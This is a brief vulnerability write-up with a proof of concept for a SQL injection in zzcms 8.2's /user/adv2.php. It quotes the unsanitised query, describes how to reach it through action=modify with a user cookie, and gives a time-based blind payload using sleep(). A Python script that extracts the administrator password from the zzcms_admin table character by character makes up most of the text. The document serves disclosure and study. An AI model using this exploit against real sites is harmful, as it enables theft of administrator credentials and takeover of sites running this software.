| title | tags | grammar_cjkRuby |
|---|---|---|
adv2.php |
新建,模板,小书匠 |
true |
/user/adv2.php
Edition :
zzcms 8.2
Location
/user/adv2.php
Code:
$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");
Rows : 72
Harm
Can get password through SQl injection
Cause the cause
Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0
That is to say, let zzcms_main or zzcms_zh have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST
Then go back and find that need to let action=modify
At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.
poc
import requests
import string
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
'UserName':'test2'
}
flag = ''
for i in range(1,40):
for j in range(33,125):
data = {
'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i,j)
}
#print data
r = s.post(url,data=data,cookies=cookies)
#print r.text
sec=r.elapsed.seconds
#print i,j,sec
if sec >2:
flag += chr(j)
print flag
break
print flagGet the administrator password



